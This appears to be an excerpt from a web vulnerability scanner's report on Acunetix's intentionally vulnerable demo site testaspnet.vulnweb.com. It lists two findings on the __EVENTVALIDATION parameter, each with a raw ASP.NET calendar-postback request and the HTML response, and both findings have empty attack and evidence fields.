Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8319&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgCAWoobq9oIZGRkYtTlnxJY%2B6yxzaZCn5pY%2FBJcV2k%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKg1NT2AQLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gL1zlTCygVYL%2BcDGxnk6Mz70OPzNA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:23:25 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgCAWoobq9oIZGRkYtTlnxJY+6yxzaZCn5pY/BJcV2k=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKg1NT2AQLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gL1zlTCygVYL+cDGxnk6Mz70OPzNA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:White" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1137 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,137 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8430&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDANO5UAtsIZGRkXIG%2Bv683r5j6w1YTGDgkM21MFa4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKg8OSaDALQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBUkm0obUD9qnIK%2FM1pqAKFHruoC1
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:13 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDANO5UAtsIZGRkXIG+v683r5j6w1YTGDgkM21MFa4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKg8OSaDALQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBUkm0obUD9qnIK/M1pqAKFHruoC1" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:White" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
